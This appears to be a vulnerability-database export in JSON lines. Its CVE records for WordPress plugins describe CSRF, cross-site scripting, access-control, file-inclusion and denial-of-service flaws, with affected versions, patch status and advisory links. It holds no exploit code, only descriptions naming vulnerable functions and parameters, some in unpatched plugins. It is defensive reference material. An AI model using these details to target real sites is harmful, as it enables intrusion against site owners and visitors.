{"CVE_ID":"CVE-2024-11812","slug":"wtyczka-seopilot-dla-wp","versionImpact":"3.3.091","description":"The Wtyczka SeoPilot dla WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.091. This is due to missing or incorrect nonce validation on the SeoPilot_Admin_Options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wtyczka-seopilot-dla-wp\\\/trunk\\\/seopilot.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wtyczka-seopilot-dla-wp\\\/trunk\\\/seopilot.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5efb2fbe-d839-4fb1-80bb-91adf0d39a2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5efb2fbe-d839-4fb1-80bb-91adf0d39a2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7231","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 lacks proper access controls, allowing unauthenticated visitors to delete links.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/797692ce-f355-4d4a-af01-4bd9abc60a34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/797692ce-f355-4d4a-af01-4bd9abc60a34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6061","slug":"kk-youtube-video","versionImpact":"0.2","description":"The kk Youtube Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kkytv' shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-youtube-video\\\/trunk\\\/kk-youtube-video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-youtube-video\\\/trunk\\\/kk-youtube-video.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd581604-e2f6-42c4-81ef-10873683526b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd581604-e2f6-42c4-81ef-10873683526b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5767","slug":"crowdfunding-for-woocommerce","versionImpact":"3.1.14","description":"The Crowdfunding for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 3.1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crowdfunding-for-woocommerce\\\/trunk\\\/includes\\\/shortcodes\\\/class-wc-crowdfunding-shortcodes-progress-bar.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crowdfunding-for-woocommerce\\\/trunk\\\/includes\\\/shortcodes\\\/class-wc-crowdfunding-shortcodes-progress-bar.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crowdfunding-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crowdfunding-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a576f39e-42de-4881-a490-000850ea1d2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a576f39e-42de-4881-a490-000850ea1d2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0550","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the fact that during menu item deletion\/modification, the plugin does not verify that the post ID provided to the AJAX action is indeed a menu item. This makes it possible for authenticated attackers, with subscriber-level access or higher, to modify or delete arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4fba5-cd19-4b96-aa09-07ed6d52a107\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/faa4fba5-cd19-4b96-aa09-07ed6d52a107\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4719","slug":"simple-membership","versionImpact":"4.3.5","description":"The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `list_type` parameter in versions up to, and including, 4.3.5 due to insufficient input sanitization and output escaping. Using this vulnerability, unauthenticated attackers could inject arbitrary web scripts into pages that are being executed if they can successfully trick a user into taking an action, such as clicking a malicious link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-membership\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-membership\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b10172-7e54-4ff8-9fbb-41d160ce49e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b10172-7e54-4ff8-9fbb-41d160ce49e4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2962730%40simple-membership&new=2962730%40simple-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2962730%40simple-membership&new=2962730%40simple-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5425","slug":"post-meta-data-manager","versionImpact":"1.2.0","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pmdm_wp_change_user_meta and pmdm_wp_change_post_meta functions in versions up to, and including, 1.2.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain elevated (e.g., administrator) privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981559\\\/post-meta-data-manager\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f4e710-99a2-49df-a513-725e1daaa18a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f4e710-99a2-49df-a513-725e1daaa18a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0708","slug":"landing-page-cat","versionImpact":"1.7.2","description":"The Landing Page Cat \u2013 Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to access landing pages that may not be public.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034324\\\/landing-page-cat\\\/trunk\\\/includes\\\/landing\\\/landing.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034324\\\/landing-page-cat\\\/trunk\\\/includes\\\/landing\\\/landing.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2238","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Mouse Cursor module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5541","slug":"ibtana-visual-editor","versionImpact":"1.2.3.3","description":"The Ibtana \u2013 WordPress Website Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ibtana_visual_editor_register_ajax_json_endpont' function in all versions up to, and including, 1.2.3.3. This makes it possible for unauthenticated attackers to update option values for reCAPTCHA keys on the WordPress site. This can be leveraged to bypass reCAPTCHA on the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e022febe-7295-493d-afa7-185f55b4d3b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e022febe-7295-493d-afa7-185f55b4d3b9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/admin\\\/settings.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/admin\\\/settings.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/dist\\\/blocks.build.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12606","slug":"ai-scribe-the-chatgpt-powered-seo-content-creation-wizard","versionImpact":"2.3","description":"The AI Scribe \u2013 SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the engine_request_data() function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L730\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L730\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bc4a765-719e-4e99-b7f3-d255e4c019f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bc4a765-719e-4e99-b7f3-d255e4c019f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1657","slug":"ulisting","versionImpact":"2.1.7","description":"The Directory Listings WordPress plugin \u2013 uListing plugin for WordPress is vulnerable to unauthorized modification of data and PHP Object Injection due to a missing capability check on the stm_listing_ajax AJAX action in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to update post meta data and inject PHP Objects that may be unserialized.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e70184f-94b6-4742-b99b-6eec9d28f17c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e70184f-94b6-4742-b99b-6eec9d28f17c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7230","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as admin to perform Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/402e428b-f966-4a36-ace0-d0ded9410b1d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/402e428b-f966-4a36-ace0-d0ded9410b1d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6055","slug":"zen-social-sticky","versionImpact":"0.3","description":"The Zen Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3. This is due to missing or incorrect nonce validation on the 'zen-social-sticky\/zen-sticky-social.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zen-social-sticky\\\/trunk\\\/zen-sticky-social.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zen-social-sticky\\\/trunk\\\/zen-sticky-social.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cfebae-bbf3-4b0b-9afc-3ef2548045e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cfebae-bbf3-4b0b-9afc-3ef2548045e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5754","slug":"useful-tab-block-responsive-amp-compatible","versionImpact":"1.3.2","description":"The Useful Tab Block \u2013 Responsive & AMP-Compatible plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/useful-tab-block-responsive-amp-compatible\\\/trunk\\\/dynamic.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/useful-tab-block-responsive-amp-compatible\\\/trunk\\\/dynamic.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/useful-tab-block-responsive-amp-compatible\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/useful-tab-block-responsive-amp-compatible\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56b637dc-4382-438f-ae36-e5075580a7d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56b637dc-4382-438f-ae36-e5075580a7d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0581","slug":"private-content","versionImpact":"8.4.3","description":"The PrivateContent plugin for WordPress is vulnerable to protection mechanism bypass due to the use of client side validation in versions up to, and including, 8.4.3. This is due to the plugin checking if an IP had been blocklisted via client-side scripts rather than server-side. This makes it possible for unauthenticated attackers to bypass any login restrictions that may prevent a brute force attack.","refs":"[{\"url\":\"https:\\\/\\\/lcweb.it\\\/privatecontent\\\/changelog\",\"name\":\"https:\\\/\\\/lcweb.it\\\/privatecontent\\\/changelog\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de73304e-7a28-4304-b1ed-2f6dd7738236\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de73304e-7a28-4304-b1ed-2f6dd7738236\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25150","slug":"email-templates","versionImpact":"1.3.","description":"The Email Templates plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.3. This makes it possible for attackers to present phishing forms or conduct cross-site request forgery attacks against site administrators.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5c449f1-4715-4033-b0a3-6a8ca968aabc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5c449f1-4715-4033-b0a3-6a8ca968aabc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-templates\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-templates\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4634","slug":"media-library-assistant","versionImpact":"3.09","description":"The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~\/includes\/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/174508\\\/wpmla309-lfiexec.tgz\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/174508\\\/wpmla309-lfiexec.tgz\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Patrowl\\\/CVE-2023-4634\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/Patrowl\\\/CVE-2023-4634\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patrowl.io\\\/blog-wordpress-media-library-rce-cve-2023-4634\\\/\",\"name\":\"https:\\\/\\\/patrowl.io\\\/blog-wordpress-media-library-rce-cve-2023-4634\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35909","slug":"ninja-forms","versionImpact":"3.6.25","description":"Uncontrolled Resource Consumption vulnerability in Saturday Drive Ninja Forms Contact Form \u2013 The Drag and Drop Form Builder for WordPress leading to DoS. This issue affects Ninja Forms Contact Form \u2013 The Drag and Drop Form Builder for WordPress: from n\/a through 3.6.25.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-forms\\\/wordpress-ninja-forms-plugin-3-6-25-denial-of-service-attack-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-forms\\\/wordpress-ninja-forms-plugin-3-6-25-denial-of-service-attack-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2237","slug":"premium-addons-pro","versionImpact":"2.9.12","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Global Badge module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/premiumaddons.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4375","slug":"master-slider","versionImpact":"3.9.10","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_layer' shortcode in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on the 'css_id' user supplied attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35ead2b5-8b50-40e1-9b4a-547d97f34c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35ead2b5-8b50-40e1-9b4a-547d97f34c4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L817\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L817\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5881","slug":"webico-slider-flatsome-addons","versionImpact":"2.0.1","description":"The Webico Slider Flatsome Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wbc_image shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71eeddf4-5693-41bc-93ad-3c93dafdd3bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71eeddf4-5693-41bc-93ad-3c93dafdd3bc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webico-slider-flatsome-addons\\\/trunk\\\/shortcodes\\\/wbc_slider.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webico-slider-flatsome-addons\\\/trunk\\\/shortcodes\\\/wbc_slider.php#L4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9689","slug":"post-from-frontend","versionImpact":"1.0.0","description":"The Post From Frontend WordPress plugin through 1.0.0 does not have a CSRF check when deleting posts, which could allow attackers to make a logged-in admin perform such an action via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea501d37-1ec2-43ec-873a-ec204e965f60\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea501d37-1ec2-43ec-873a-ec204e965f60\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11784","slug":"ticketsource-events","versionImpact":"3.0.2","description":"The Sell Tickets Online \u2013 TicketSource Ticket Shop for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ticketshop' shortcode in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ticketsource-events\\\/trunk\\\/includes\\\/ticketsource-events-build.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ticketsource-events\\\/trunk\\\/includes\\\/ticketsource-events-build.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ticketsource-events\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ticketsource-events\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970826cf-316d-4fce-ac90-bf338c5ef3e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/970826cf-316d-4fce-ac90-bf338c5ef3e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
